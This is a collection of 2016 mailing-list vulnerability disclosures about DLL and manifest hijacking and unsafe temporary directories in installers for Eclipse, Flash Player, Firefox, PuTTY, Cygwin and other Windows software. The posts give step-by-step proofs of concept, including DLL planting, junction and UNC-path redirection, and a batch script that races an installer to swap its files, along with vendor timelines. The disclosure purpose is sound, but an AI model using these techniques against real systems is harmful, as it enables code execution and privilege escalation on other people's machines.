* Practice STRICT privilege separation: UAC is a VERY BAD joke!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of "%TEMP%"; use
  <> to
  decode it to "deny execution of files in this directory for
  everyone, inheritable to all files in all subdirectories".

stay tuned
Stefan Kanthak

[*] according to Microsoft's own SIR reports, more than half of
the Windows installations which send telemetry data have only
one active user account, i.e. some hundred million Windows
installations are susceptible to this design bug!


2016-05-31vulnerability report sent to vendor

2016-06-02vendor replies, opens MSRC Case 33699

  no more replies for 6 long weeks, despite

2016-07-14status request sent to vendor

2016-07-15vendor replies:
  "DISM will create a temporary directory inside the
   administrators %TEMP%, which normal/standard users
   do NOT have access to.
   As such, we are resolving this as 'by design'."

  "There is no separate 'administrators' %TEMP% in the
   default user account created during Windows setup!"


2016-07-23report published

Executable installers are vulnerable^WEVIL (case 37): eclipse-inst-win*.exe vulnerable to DLL redirection and manifest hijacking

2016-07-25 Thread Stefan Kanthak
Hi @ll,

this is a followup to "case 36" (posted as "case 35" by mistake),

Proof of concept #1:

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the (empty) files "eclipse-inst-win32.exe.local" and
   "eclipse-inst-win64.exe.local" in the directory where you
   saved the downloaded installers:
  Copy NUL: eclipse-inst-win32.exe.local
  Copy NUL: eclipse-inst-win64.exe.local

3. Create empty files kernel32.dll, kernelbase.dll, advapi32.dll,
   msvcrt.dll, ..., version.dll in the directory where you saved
   the downloaded installers.

4. Execute the downloaded installers.


5. Replace the empty DLLs created in step 3 with (malicious) DLLs
   of your choice.

6. Execute the downloaded installer which matches the processor
   architecture of the DLLs placed in step 5.


Proof of concept #2:

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the subdirectories "eclipse-inst-win32.exe.local" and
   "eclipse-inst-win64.exe.local" in the directory where you
   saved the downloaded installers.

3. Copy any (malicious) DLL of your choice as kernel32.dll,
   kernelbase.dll, advapi32.dll, msvcrt.dll, ..., version.dll
   into the subdirectories created in step 2 (32-bit DLLs
   into "eclipse-inst-win32.exe.local", 64-bit DLLs into

4. Execute the downloaded installers.


Proof of concept #3:

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the junctions "eclipse-inst-win32.exe.local" and
   "eclipse-inst-win64.exe.local" in the directory where you
   saved the downloaded installers:
  MkLink /J eclipse-inst-win32.exe.local %SystemRoot%\System32
  MkLink /J eclipse-inst-win64.exe.local %SystemRoot%\SysWow64

3. Execute the downloaded installers.


4. Create the two junctions to directories with malicious DLLs of
   your choice if you want to get pwned instead.

5. Execute the downloaded installers.


Proof of concept #4:

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
   "eclipse-inst-win64.exe.manifest" with the following contents
   in the directory where you saved the downloaded installers:

   --- eclipse-inst-win*.exe.manifest ---
   --- EOF ---

3. Execute the downloaded installers.


Proof of concept #5:

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
   "eclipse-inst-win64.exe.manifest" with the following contents
   in the directory where you saved the downloaded installers:

   --- eclipse-inst-win*.exe.manifest ---
   --- EOF ---

3. Execute the downloaded installers:
   Windows "user account control" will prompt for elevation, all
   hijacked DLLs will be executed with administrative privileges.


Proof of concept #6:

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
   "eclipse-inst-win64.exe.manifest" with the following contents
   in the directory where you saved the downloaded installers:

   --- eclipse-inst-win32.exe.manifest ---
   --- EOF ---

   --- eclipse-inst-win64.exe.manifest ---
   --- EOF ---

   Optionally add more  elements for other DLLs loaded by
   the installers as you like.

3. Execute the downloaded installers.


4. Replace the UNC pathnames to your own host with UNC paths to
   any host reachable from your network where you placed some
   malicious DLLs to get pwned instead.

5. Execute the downloaded installers.


6. Add the  element from poc#5 to achieve remote code
   execution with (user-assisted) escalation of privilege.

7. Execute the downloaded installers.


stay tuned
Stefan Kanthak

Executable installers are vulnerable^WEVIL (case 35): eclipse-inst-win*.exe vulnerable to DLL and EXE hijacking

2016-07-19 Thread Stefan Kanthak
Hi @ll,

eclipse-inst-win32.exe (and of course eclipse-inst-win64.exe
too) loads and executes multiple DLLs (in version 4.5 also
CMD.EXE) from its "application directory".

* version 4.5 ("Mars") on Windows 7:
  UXTheme.dll, WindowsCodecs.dll, AppHelp.dll, SrvCli.dll,
  Slc.dll, NTMarta.dll, ProfAPI.dll, SAMLib.dll

* version 4.6 ("Neon") on Windows 7:
  IEFrame.dll, Version.dll

* version 4.5 on Windows XP:
  ClbCatQ.dll, SetupAPI.dll, UXTheme.dll, RichEd20.dll

(version 4.6 not tested on Windows Embedded POSReady 2009
alias Windows XP).

For the vulnerable command line "cmd /c start " see
and CVE-2014-0315

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for
"prior art" about this well-known and well-documented vulnerability.

If an attacker places the DLLs named above and/or CMD.EXE in the
users "Downloads" directory (for example per drive-by download
or social engineering) this vulnerability becomes a remote code

Proof of concept/demonstration:

On a fresh (but fully patched) Windows installation (where a Java
Runtime is NOT installed) perform the following actions:

1. visit <>, download
   <>, save it
   as UXTheme.dll in your "Downloads" directory, then copy it as
   RichEd20.dll, SetupAPI.dll, ClbCatQ.dll, WindowsCodecs.dll,
   AppHelp.dll, SrvCli.dll, Slc.dll, NTMarta.dll, ProfAPI.dll,
   SAMLib.dll, IEFrame.dll, Version.dll;

2. Download <>
   and save it as CMD.EXE in your "Downloads" directory;

3. download eclipse-inst-win32.exe and save it in your "Downloads"

4. run eclipse-inst-win32.exe per double-click from your "Downloads"

5. click [Yes] in the message box
   | Eclipse Installer
   | (?)  The required 32-bit Java 1.7.0 virtual machine could not be found.
   |  Do you want to browse your system for it?

6. notice the message boxes displayed from the DLLs placed in step 1
   and CMD.EXE placed in step 2.


See <> and
<> as well as
<> and the not yet
finished <!execute.html> for details
about these well-known and well-documented BEGINNER'S errors!


DUMP executable installers, build packages for the target OS' native
installer instead!

See <!execute.html>
as well as <> for the long
sad story of these vulnerabilities.

stay tuned
Stefan Kanthak


2016-02-12vulnerability report sent to Eclipse Foundation


2016-02-22vulnerability report resent to Eclipse Foundation

2016-02-23answer from Eclipse Foundation:
  "we investigate"

2016-02-24provided guidance to fix both vulnerabilities

2016-02-28developer opens bug <>

2016-07-01second vulnerability report sent to Eclipse Foundation:
  recently released installer 4.6 "Neon" still vulnerable!

2016-07-12answer from developer:
  "We analyzed this again and came to the conclusion
   that the code of our installer is now safe (i.e.,
   with the fix from bug 488644). Indications are that
   your new check shows a problem much later in the
   process and that the list of loaded DLLs is totally
   different (i.e., not the one that you originally
   Moreover we're convinced that it is a security problem
   in rundll32.exe itself."

  It's DEFINITIVELY your "fixed" installer which STILL
  loads DLLs from its application directory; it's NOT
  safe, but VULNERABLE!


2016-07-19report published

[CVE-2016-1281] NOT FIXED: VeraCrypt*Setup*.exe still vulnerable to DLL hijacking

2016-07-18 Thread Stefan Kanthak
Hi @ll,

this is basically a followup to <>

CVE-2016-1281 is NOT FIXED!

I've retested the current "VeraCrypt Setup 1.17.exe" on a fully
patched Windows 7, and it is STILL (or AGAIN) vulnerable there.

The following DLLs are loaded from the "application directory"
and their DllMain() executed: VSSAPI.dll, ATL.dll, VSSTrace.dll.

See <>,
<> and
<> for details
about this well-known and well-documented beginner's error!

Due to the application manifest embedded in the executable installer
which specifies "requireAdministrator" the installer is run with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of the DLLs therefore results
in an escalation of privilege!

For software downloaded with a web browser the "application
directory" is typically the user's "Downloads" directory: see
and <> for prior


DUMP executable installers, build packages for the target OS' native
installer instead!

See <!execute.html>
as well as <> for the long
sad story of these vulnerabilities.

stay tuned
Stefan Kanthak


2015-12-23vulnerability report sent to author

2016-01-03author confirmed vulnerability, got CVE-2016-1281

  worked with author until he finally was able to build
  an installer which didn't show this vulnerability.

  Also notified author:
  "as soon as Microsoft introduces new/other dependencies
   between Windows' system DLLs or refactors them (again)
   this vulnerability will VERY likely resurface again."

2016-01-11report published by author (see above)

2016-07-01vulnerability report sent to author ("I told you so!")


2016-07-17report published

[CVE-2016-1014, CVE-2016-4247] Executable installers are vulnerable^WEVIL (case 35): Adobe's Flash Player (un)installers

2016-07-13 Thread Stefan Kanthak
Hi @ll,

the executable installers of Flash Player released 2016-06-15
fixed CVE-2016-1014 in the second attempt, but another vulnerability
remained: they create(d) and use(d) UNSAFE temporary subdirectories
into which they copy/ied themselves and extract(ed) a file "fpb.tmp"
which they load(ed) and execute(d) later with elevated privileges.

An unprivileged user can/could overwrite both files between creation
and execution and gain elevation of privilege.

See <> for this type
of well-known and well-documented vulnerability!

stay tuned
Stefan Kanthak


2016-03-12initial report sent to Adobe PSIRT

2016-03-13Adobe PSIRT acknowledges vulnerability and assigns

2016-04-06Adobe PSIRT informs about CVE assigned and upcoming
  fix scheduled for release later that week

2016-04-17notification sent to Adobe PSIRT: fix is incomplete,
  vulnerability persists

2016-04-17Adobe PSIRT acknowledges receipt of second report

2016-04-17Adobe PSIRT acknowledges vulnerability ... again

2016-06-17Adobe released fixed Flash Player (un)installers,
  report for CVE-2016-1014 published

2016-06-17new report sent to Adobe PSIRT: unsafe TEMP
  directory allows escalation of privilege

2016-06-17Adobe PSIRT acknowledges receipt

2016-06-17Adobe PSIRT acknowledges vulnerability and assigns

2016-07-10Adobe PSIRT informs about CVE assigned and upcoming
  fix scheduled for release later this week

2016-07-12Adobe released fixed Flash Player (un)installers,
  report for CVE-2016-4247 published

Executable installers are vulnerable^WEVIL (case 34): Microsoft's vs-community-*.exe susceptible to DLL hijacking

2016-07-01 Thread Stefan Kanthak
Hi @ll,

the executable installer for Microsoft's Visual Studio 2015
Community Edition, available from <>,
is vulnerable to DLL hijacking: on a fully patched Windows 7 SP1
it loads the following DLLs from its "application directory"
instead of Windows' "system directory":
Version.dll, AppHelp.dll, NTMARTA.dll, CryptSP.dll, RPCRTRemote.dll

Additionally it loads API-MS-Win-Downlevel-ShlWAPI-L2-1-0.dll from
the PATH.

See <>
or <> and
for a similar vulnerability.

stay tuned
Stefan Kanthak


2016-06-01sent vulnerability report to vendor plus US-CERT

  NO RESPONSE from vendor, not even an acknowledgement
  of receipt

2016-06-07US-CERT tells me that Microsoft informed them that
  they won't act on this report

  still no response from vendor

2016-07-01report published

[CVE-2016-1014] Escalation of privilege via executable (un)installers of Flash Player

2016-06-17 Thread Stefan Kanthak
Hi @ll,

the executable (un)installers for Flash Player before version and (both released on 2016-06-15) are
vulnerable to DLL hijacking: they load and execute multiple
Windows system DLLs from their "application directory" instead
of Windows' "system directory" %SystemRoot%\System32\.

On Windows 7 and before they also (try to) load PCACli.dll and
API-MS-Win-Downlevel-Shell32-l1-1-0.dll from the PATH:
PCACli.Dll and API-MS-Win-Downlevel-Shell32-l1-1-0.dll are not
present there, these DLLs were first shipped with Windows 8.

On Windows XP and before they additionally try to load DWMAPI.dll,
PropSys.dll, DevRtl.dll and RPCRTRemote.dll from the PATH: these
DLLs were first shipped with Windows Vista.

See <>,
<> and
<> for details
about this well-known and well-documented beginner's error!

Due to the application manifest embedded in the executables which
specifies "requireAdministrator" the installers are run with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of the DLLs therefore results
in an escalation of privilege!

Proof of concept/demonstration:

1. visit (and read) <>,
   then download <>
   and save it as PCACli.dll, API-MS-Win-Downlevel-Shell32-l1-1-0.dll,
   DWMAPI.dll, RPCRTRemote.dll, OLEAcc.dll, PSAPI.dll, SetupAPI.dll,
   ClbCatQ.dll, WSock32.dll, WS2_32.dll, HNetCfg.dll, DNSAPI.dll,
   IPHlpAPI.dll, RASAPI32.dll, SensAPI.dll, RASAdHlp.dll, RASMan.dll
   plus UserEnv.dll, COMRes.dll, WS2Help.dll, TAPI32.dll, RTUtils.dll
   SAMLib.dll and WinMM.dll in your "Downloads" directory;

2. fetch the (un)installers for Flash Player released before 2016-06-15
   from Adobe's web site and save them in your "Downloads" directory;

3. run the (un)installers downloaded in step 2 and notice the message
   boxes displayed from the DLLs placed in step 1.


JFTR: since the (un)installers are 32-bit programs and (un)install
  both the 32-bit and 64-bit versions of Flash Player this POC
  works on 64-bit Windows too.

stay tuned
Stefan Kanthak


2016-03-12first vulnerability report sent to Adobe

2016-03-13Adobe acknowledged the receipt

2016-04-06Adobe informed about the upcoming patch to be released
  2016-04-07 and the assignment of CVE-2016-1014

2016-04-17second vulnerability report sent to Adobe: the "fixed"
  (un)installers are still vulnerable, they just load
  some other DLLs now

2016-04-20Adobe confirmed the second report and announced to fix
  the vulnerability in the June update

2016-06-15Adobe released fixed (un)installers

2016-06-17report published

[CVE-2014-1520] NOT FIXED: privilege escalation via Mozilla's executable installers

2016-06-15 Thread Stefan Kanthak
Hi @ll,

<> should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!

JFTR: this type of vulnerability (really: a bloody stupid trivial
  beginner's error!) is well-known and well-documented as

Proof of concept/demonstration:

0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   and save them in an arbitrary directory;

1. download <>
   plus <> and
   save them in an(other) arbitrary directory;

2. start your editor, copy and paste the following 10 lines and
   save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
   and "SENTINEL.EXE" downloaded in step 1:

@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"

3. execute the batch script "POC.CMD" created in step 2;

4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   downloaded in step 0. and proceed as directed: notice the message
   boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
   placed by the batch script started in step 3 in the unsafe TEMP
   subdirectory created by Mozilla's vulnerable executable installers!



0. don't use executable installers. DUMP THEM, NOW!

1. see <!execute.html> as well as

2. stay away from Mozilla's vulnerable installers for their Windows
   software (at least until Mozilla starts to develop a sense for
   the safety and security of their users).

stay tuned
Stefan Kanthak



  not even an attempt to fix this vulnerability (check but


  not even an attempt to fix this vulnerability (check but

2016-06-15deadline expired after 45 days, report published

Mozilla doesn't care for upstream security fixes, and doesn't bother to send own security fixes upstream

2016-04-29 Thread Stefan Kanthak
Hi @ll

despite better knowledge and MULTIPLE bug/vulnerability reports
(see <>,
<>, ...)
Mozilla continues to ship Firefox and Thunderbird for Windows with
a vulnerable executable installer.

Proof of concept/demonstration:

1. visit <>, download
   <> and save
   it as ShimEng.dll in your "Downloads" folder, then copy it as
   WinMM.dll, SetupAPI.dll, MSACM32.dll, UXTheme.dll, DWMAPI.dll,
   ShFolder.dll, RichEd20.dll, ClbCatQ.dll, COMRes.dll, Version.dll,
   SAMCli.dll, SFC.dll, SFC_OS.dll, UserEnv.dll, ProfAPI.dll, MPR.dll,
   NTMarta.dll, Secur32.dll and CryptSP.dll

2. download any full-package installer for Firefox or Thunderbird
   from <>
   or <>
   (these are self-extractors built with 7-zip)

3. extract setup.exe from the downloaded self-extractor and save it
   in your "Downloads" folder, for example using the command line
  7za.exe x  setup.exe

   (or start the downloaded self-extractor, find the temporary
   subdirectory 7z*.tmp it created below %TEMP% and copy setup.exe
   from this subdirectory to your "Downloads" folder)

4. execute the extracted/copied setup.exe and notice the message
   boxes displayed from the DLL(s) downloaded in step 1:


See <>,
<> plus
<> for the
well-known and well-documented DLL search path vulnerability.

Stay away from Mozilla's crapware until Mozilla starts to develop
a sense for the basics of software engineering as well as the safety
and security of their users^Wvictims: the authors of the 3rd party
installer fixed these vulnerabilities about 4 months ago!

JFTR: the vulnerable executable installer is not the only outdated
  3rd party component used to build Firefox and Thunderbird!
  Mozilla even uses different versions of this vulnerable
  executable installer for Firefox and Firefox ESR.

See <>
why you should NEVER name any executable (installer) setup.exe!

stay tuned
Stefan Kanthak

PS: Mozilla fixed the same vulnerabilities in their executable self-
extractor long ago (see for example
<> or
<>), but
apparently did not send their fixes to the author of this tool.

Defense in depth -- the Microsoft way (part 39): vulnerabilities, please meet the bar for security servicing

2016-03-15 Thread Stefan Kanthak
   <> and
   save them in your "Downloads" directory;

4. Run ShlExecX.exe or ShlExec.exe;

5. Notice the message boxes displayed from the DLLs downloaded
   in steps 2 and 3: PWNED!

No response from Microsoft's Security Response Center since 10 weeks!
No answer to a status request since 10 days.

stay tuned
Stefan Kanthak

[*] executable installers/self-extractor based on SFXCAB.EXE may
be identified via their embedded manifest (resource type 24,
resource id 1):










Re: Windows Mail Find People DLL side loading vulnerability

2016-03-09 Thread Stefan Kanthak
"Securify B.V." wrote:

> Windows Mail Find People DLL side loading vulnerability
> Yorick Koster, September 2015


> - CVE-2016-0100
> - MS16-025: Security Update for Windows Library Loading to Address
> Remote Code Execution (3140709)
> Tested versions
> This issue was successfully verified on Windows Vista + Office 2010
> 32-bit.

This vulnerability demonstrates Microsoft's terrible SLOPPY coding
horror^Wpractice: it needs two mistakes to create this kind of bug!

"%CommonProgramFiles%\System\wab32res.dll" is (as its name implies)
a resource DLL, which means that it contains no code, but only
(localized) resources, and SHOULD (better: MUST) be loaded via
LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 
to avoid the call of its DllMain() startup code!

JFTR: LOAD_LIBRARY_AS_DATAFILE was introduced in the last millennium!

LoadLibraryEx("wab32res.dll", NULL, LOAD_LIBRARY_AS_DATAFILE)
were sufficient to avoid this vulnerability.

> Fix
> Microsoft released MS16-025 that fixes this vulnerability.

Have you checked how Microsoft fixed it?
Did they exercise all due diligence now, practised defense in depth
and replaced the call to
with a call to
LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 

> Details

stay tuned

Executable installers are vulnerable^WEVIL (case 30): clamwin-0.99-setup.exe allows arbitrary (remote) code execution WITH escalation of privilege

2016-03-06 Thread Stefan Kanthak
Hi @ll,

the executable installer clamwin-0.99-setup.exe (available from
<>) loads and executes DWMAPI.dll
or UXTheme.dll from its "application directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for
"prior art" about this well-known and well-documented vulnerability.

If an attacker places one of the above named DLL in the user's
"Downloads" directory (for example per "drive-by download"
or "social engineering") this vulnerability becomes a remote
code execution.

Proof of concept/demonstration:

1. visit <>, download
   <>, save it
   as UXTheme.dll in your "Downloads" directory, then copy it as

2. download clamwin-0.99-setup.exe and save it in your "Downloads"

3. execute clamwin-0.99-setup.exe from your "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in
   step 1.


See <>,
<> and
<> plus
<!execute.html> and
<> for details about
this well-known and well-documented BEGINNER'S error!  

stay tuned
Stefan Kanthak

PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from this snakeoil!


2016-03-06sent vulnerability report to authors

<>: host[] said: 550-5.1.1
The email account that you tried to reach does not exist. Please try
550-5.1.1 double-checking the recipient's email address for typos or
550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1 y186si9894139wmy.43 - gsmtp (in
reply to RCPT TO command)

<>: host[] said: 550 unknown user
(in reply to RCPT TO command)

2016-03-06report published

Executable installers are vulnerable^WEVIL (case 31): MalwareBytes' installers allows arbitrary (remote) code execution WITH escalation of privilege

2016-03-06 Thread Stefan Kanthak
Hi @ll,

Malwarebytes executable installers mbam-setup-
and mbae-setup- (available from
<> and
<>) load
and execute UXTheme.dll and DWMAPI.dll from their "application

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <>

If an attacker places UXTheme.dll and/or DWMAPI.dll in the user's
"Downloads" directory, for example per "drive-by download" or
"social engineering", this vulnerability becomes a remote code

Due to the application manifest embedded in the executables which
specifies "requireAdministrator" the executable installers are run
with administrative privileges ("protected" administrators are
prompted for consent, unprivileged standard users are prompted for
an administrator password); execution of the DLLs therefore results
in an escalation of privilege!

Proof of concept/demonstration:

1. visit <>, download
   <>, save it
   as UXTheme.dll in your "Downloads" directory, then copy it as

2. download mbam-setup- and mbae-setup-
   and save them in your "Downloads" directory;

3. execute mbam-setup- and mbae-setup-
   from your "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in step 1.


See <>,
<> and plus
<!execute.html> and
<> for details about
this well-known and well-documented BEGINNER'S error!

Stefan Kanthak

PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from this snakeoil!


2015-12-25sent report regarding MBAM to vendor

2015-12-25automatic reply from vendor:
  "We have received your request and an agent will respond
   to your ticket in the order in which it was received."

2016-01-03reply from vendor:
  "We'll take this into consideration for a near-future
   installer revamp."

2016-02-02requested status update

  NO REPLY, not even an acknowledgement of receipt

2016-02-02sent notice to Marcin Kleczynski after his public
  announcement of a bug bounty program

2016-02-02reply from Marcin Kleczynski:
  "I'm copying Pedro Bustamante who organizes our bug
   bounty program to take a look."

  NO reply from Pedro Bustamante

2016-02-12sent report regarding MBAE to vendor

  NO REPLY, not even an acknowledgement of receipt

2016-02-22resent report regarding MBAE to vendor

  NO REPLY, not even an acknowledgement of receipt

2016-03-06report published in accordance with my disclosure
  policy <>

Executable installers are vulnerable^WEVIL (case 29): putty-0.66-installer.exe allowa arbitrary (remote) code execution WITH escalation of privilege

2016-03-01 Thread Stefan Kanthak

putty-0.66-installer.exe loads and executes DWMAPI.dll or
UXTheme.dll from its "application directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for
"prior art" about this well-known and well-documented vulnerability.

If an attacker places one of the above named DLL in the user's
"Downloads" directory (for example per "drive-by download"
or "social engineering") this vulnerability becomes a remote
code execution.

Proof of concept/demonstration:

1. visit <>, download
   <>, save it
   as UXTheme.dll in your "Downloads" directory, then copy it as

2. download putty-0.66-installer.exe and save it in your
   "Downloads" directory;

3. execute putty-0.66-installer.exe from your "Downloads"

4. notice the message boxes displayed from the DLLs placed in
   step 1.


See <>,
<> and
<> plus
<!execute.html> and
<> for details about
this well-known and well-documented BEGINNER'S error!  

stay tuned
Stefan Kanthak


2015-12-24sent vulnerability report to author

  NO REPLY, not even an acknowledgement of receipt

2016-01-02resent vulnerability report to author

  NO REPLY, not even an acknowledgement of receipt

2016-03-01report published

Executable installers are vulnerable^WEVIL (case 27): Cygwin's installers allow arbitrary (remote) code execution WITH escalation of privilege

2016-02-28 Thread Stefan Kanthak
Hi @ll,

Cygwin's setup-x86.exe loads and executes UXTheme.dll
(on Windows XP also ClbCatQ.dll) and some more DLLs from its
"application directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <>

If UXTheme.dll (or one of the other DLLs) gets planted in the
user's "Downloads" directory per "drive-by download" or "social
engineering" this vulnerability becomes a remote code execution.

If setup-x86.exe is NOT started with --no-admin the vulnerability
results in an escalation of privilege too!

Proof of concept/demonstration:

1. visit <>, download
   <> and save
   it as UXTheme.dll in your "Downloads" directory, then copy it
   as DWMAPI.dll;

2. on Windows XP, copy the downloaded UXTheme.dll as ClbCatQ.dll;

3. download setup-x86.exe and save it in your "Downloads" directory;

4. execute setup-x86.exe from your "Downloads" directory;

5. notice the message boxes displayed from the DLLs placed in step 1
   (and ClbCatQ.dll placed in step 2).


6. copy the downloaded UXTheme.dll as WSock32.dll (on Windows XP
   also as PSAPI.dll and WS2_32.dll);

7. rerun setup-x86.exe from your "Downloads" directory.


8. turning the denial of service into an arbitrary (remote) code
   execution is trivial: just add the SINGLE entry (PSAPI.dll:
   EnumProcesses, WSock32.Dll: recv, WS2_32.dll: Ordinal 21)
   referenced from setup-x86.exe to a rogue DLL of your choice.

PWNED again!

See <>,
<> and
<> plus
<!execute.html> and
<> for details about
this well-known and well-documented BEGINNER'S error!

stay tuned
Stefan Kanthak


2015-12-28report sent to <>,
  <> and <>


2015-12-28report sent to <>

  No answer, not even an acknowledgement of receipt

2016-01-06report resent to <> and

2016-01-07clueless reply from reader of <>:
  "- cygwin mailing list is public, you violate your
 own policy;
   - Windows XP is unsupported"

2016-01-07sent reply to <>:
  - see <>
| cygwin: In general, you should send questions and
| bug reports here.
  - see RFC 2142: <>,
<> and <>
all bounce, then read my policy again.
  - Windows Embedded POSReady 2009 is Windows XP SP3
in disguise and supported until 2019.
  - which part of "UXTheme.dll is loaded (on every version
of Windows)" is not understood?

In an effort to cut down on our spam intake, we block email that is
detected as spam by the SpamAssassin program.  Your email was flagged as
spam by that program.  See: for more
Contact if you have questions about this. (#5.7.2)

2016-01-07sent questions to <>

<>: host[] said:
552 spam score exceeded threshold (in reply to end of DATA command)

2016-02-26report published
  Cygwin is obviously neither interested in communication
  nor willing to fix their vulnerable installer!

Executable installers are vulnerable^WEVIL (case 28): Google's Chrome cleanup tool allows arbitrary (remote) code execution WITH escalation of privilege

2016-02-28 Thread Stefan Kanthak
Hi @ll,

Google's software_removal_tool.exe alias Chrome Cleanup Tool loads
and executes several DLLs from its "application directory" during

* Windows XP:
  SetupAPI.dll, NTMarta.dll, ClbCatQ.dll, SRClient.dll, UXTheme.dll,
  RASAPI32.dll, HNetCfg.dll, IPHlpAPI.dll, RASAdHlp.dll, XPSP2Res.dll,
  RichEd20.dll, SENSAPI.dll

* Windows 7:
  NTMarta.dll, SRClient.dll, DWMAPI.dll, UXTheme.dll, IPHlpAPI.dll,

Additionally the following DLLs are loaded from its "application
directory" during load-time:

WS2_32.dll, WS2HELP.dll, PSAPI.DLL, WINMM.dll, WINHTTP.dll,
ProfAPI.dll, Secur32.dll, Version.dll

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for
"prior art" about this well-known and well-documented vulnerability.

If an attacker places the DLLs named above in the users "Downloads"
directory (for example per drive-by download or social engineering)
this vulnerability becomes a remote code execution.

See <>
and <>
plus <>

Proof of concept (verified on Windows XP and Windows 7 using
version 2.46 and of software_removal_tool.exe):

1. visit <>, download
   <> and save
   it as UXTheme.dll in your "Downloads" directory, then copy it
   as RichEd20.dll, ClbCatQ.dll, SetupAPI.dll, DWMAPI.dll etc.;

2. download software_removal_tool.exe and save it in your
   "Downloads" directory;

3. run software_removal_tool.exe from the "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in
   step 1.


5. create empty files WS2_32.dll, WS2HELP.dll, PSAPI.DLL, WINMM.dll,
   WINHTTP.dll, ProfAPI.dll, Secur32.dll, Version.dll in your
   "Downloads" directory;

6. run software_removal_tool.exe from the "Downloads" directory.


This denial of service can easily turned into arbitrary code
execution too: just create a DLL with all the entries referenced
from software_removal_tool.exe.

For this well-known (trivial, easy to avoid, easy to detect and
easy to fix) beginner's error see
<> and
<> plus

| To ensure secure loading of libraries
| * Use proper DLL search order.
| * Always specify the fully qualified path when the library location
|   is constant.

Additionally software_removal_tool.exe uses an UNSAFE temporary
directory %TEMP%\scoped_dir_\ to extract and run

For this well-known (trivial, easy to avoid, easy to detect and
easy to fix) beginner's error see
<> and
<> plus
<> and

stay tuned
Stefan Kanthak


2016-01-28sent vulnerability report to <>

  NO reply

2016-02-05resent vulnerability report to <>

2016-02-10reply from Google security team:
  "Chrome is not in scope for the Google VRP program, and has
   a separate bug reporting process."

2016-02-10resent vulnerability report to <>

  NO reply, not even an acknowledgement of receipt

2016-02-24resent vulnerability report to <>
  and <>

2016-02-24reply from Google security team:
  "This is working as intended."

Google want's to have your Windows pwned!

2016-02-24completely clueless reply from Chromium telling that they
  didn't read <>
  and <>
  plus <>:

  "I'm also unsure what defenses you intended to propose here,
   because the loader definitely pulls in many (all?) of those
   imports prior to any application code running -- s

Executable installers are vulnerable^WEVIL (case 4): InstallShield's wrapper and setup.exe

2016-02-24 Thread Stefan Kanthak
quot;%USERPROFILE%" as well as
   "%ALLUSERSPROFILE%" alias %ProgramData%" and "%PUBLIC%": Windows
   doesn't place executables in these directories and beyond.

   See <> as well as
   <> plus
   or <> and finally

stay tuned
Stefan Kanthak

PS: see <> (resp. the
not yet finished <!execute.html>)
for more details!

PPS: the case numbers are not in chronological order.

[°] Self-extracting archives and executable installers are flawed^W
b(rainde)ad in concept and dangerous in practice.

ALWAYS use the resp. target platforms native package and archive

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp.
16 years ago (with Office 2000).

Both .INF and .MSI are "opened" by programs residing in
%SystemRoot%\System32\ which are therefore immune to this kind
of "DLL and EXE Search Order Hijacking" attack.
Since both .INF and .MSI access the contents of .CAB directly
they eliminate the attack vector "unsafe temporary directory"

['] A well-known (trivial, easy to exploit and easy to avoid)´and
well-documented vulnerability: see
<> and

[²] Another well-known (trivial, easy to exploit and easy to avoid)
and well-documented vulnerability: see
<> ...

